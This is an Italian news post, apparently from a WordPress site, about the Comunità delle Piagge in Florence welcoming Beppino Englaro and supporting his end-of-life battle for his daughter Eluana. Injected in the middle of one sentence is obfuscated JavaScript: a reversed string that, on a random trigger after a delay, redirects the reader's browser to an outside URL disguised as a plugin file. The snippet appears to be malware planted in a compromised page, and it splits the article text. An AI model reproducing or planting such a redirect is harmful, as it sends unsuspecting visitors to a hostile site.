Domenica Beppino Englaro sarà accolto e “abbracciato” dalla Comunità delle Piagge

image_pdfimage_print

«Come cittadini vogliamo rispettare fino in fondo la Costituzione repubblicana, della vita e della libertà, ed è per questo che la nostra Comunità incontrerà Beppino Englaro, protagonista, suo malgrado, di un accanimento mediatico odioso oltre che di una terribile strumentalizzazione politica.» Con queste parole la Comunità delle Piagge spiega i motivi che hanno portato all’incontro di domenica prossima, qu (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando nel pomeriggio il padre di Eluana sarà ospite alle Piagge.

«Ci stringiamo attorno a lui e lo accogliamo con un abbraccio fraterno e affettuoso, cercando di essere dei compagni di viaggio in questa “lotta” sacrosanta e difficile per amore della vita e della Costituzione. Abbiamo accompagnato con affetto e con rispetto il dolore di un padre e di una madre per la “vita senza vita” di Eluana e nello stesso tempo abbiamo compreso e sostenuto la battaglia civile di Beppino Englaro per permettere a sua figlia di “liberare” la sua vita e accettarne la sua finitezza.»

«Durante la vicenda Englaro la Comunità delle Piagge non ha fatto parte della nuova, ostinata, “crociata” in difesa della vita, non abbiamo condiviso e non ci riconosciamo nelle dure posizioni dei vertici ecclesiastici che cercano di rimuovere la morte come limite della vita, rinunciando ad affidare quest’ultima al Padre.»

«Esiste un altro modo di pensare la realtà – conclude la nota – ed è per questo che domenica abbracceremo con spirito di com-passione Beppino Englaro, che sentiamo parte attiva della nostra Comunità perché le sue ragioni sono le nostre ragioni.»

L’appuntamento è per domenica 29 marzo alle ore 16.30 al Centro Sociale Il Pozzo in via Lombardia 1p a Firenze.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *